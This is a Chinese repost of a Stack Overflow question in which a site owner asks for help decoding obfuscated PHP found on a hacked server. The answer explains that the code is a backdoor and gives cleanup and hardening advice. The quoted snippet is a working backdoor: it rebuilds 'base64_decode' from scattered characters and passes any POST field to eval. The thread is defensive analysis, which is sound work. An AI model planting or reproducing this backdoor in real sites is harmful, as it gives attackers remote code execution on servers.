gpt4 book ai didi

php - 试图解码病毒

转载 作者:IT王子 更新时间:2023-10-28 23:57:02 27 4
gpt4 key购买 nike

我的服务器最近受到了攻击,我一直在尝试研究它是如何以及为什么会发生的。

我在病毒文件中发现了一个非常相似的模式,看起来像这样 - 据我所知,它正在尝试运行特定文件?

有没有人见过这样的事情,我应该如何解释?它只是根据 $sF 字符串抓取单个字符吗?

<?php

$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
eval($s21($s22));
}?>

最佳答案

变量$s21等于base64_decode$s22等于$_POST['nd335c3']

每当向您的服务器发出 POST 请求时,它都会执行 $_POST['nd335c3']; 中的任何命令,正如您所料,这是非常危险的.

我非常怀疑您的服务器被黑了,而是您的网站脚本被利用了。您的网站上是否有用户可以上传文件的地方?我在 WordPress 中看到很多这样的东西,但插件编码很差。

解决问题

要解决此问题,请先删除此文件或代码部分。您可能希望关闭您的站点并将其置于维护模式,直到您可以搜索并验证所有其他文件都没有被修改。

网站备份并运行后,记录对被黑文件所在位置的请求或包含相同 POST 变量的请求。

一旦有用户向漏洞利用发送数据,您就可以检查所有其他日志文件并将它们与相同的 IP 地址和用户代理进行比较。这是一个遥远的镜头,但希望他们只使用一台计算机来进行攻击。从日志中你可以看到他们究竟访问了哪些内容来执行攻击并上传被利用的文件。

在未来预防这种情况

  1. 除非您信任开发者并相信它是完全安全的并且知道他们会发布更新,否则请勿将您在网上找到的任何代码安装到您的网站上。
  2. 将您的网络服务器设置为除了上传目录和/tmp
  3. 之外没有写入权限
  4. 验证所有上传的文件,确保它们完全符合您的预期。
  5. 不允许 PHP 在文件上传到的地方运行,将文件下载为静态直接文件。这样,如果上传的文件绕过了您的文件检查,它仍然不会造成任何损害。

关于php - 试图解码病毒,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29321907/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com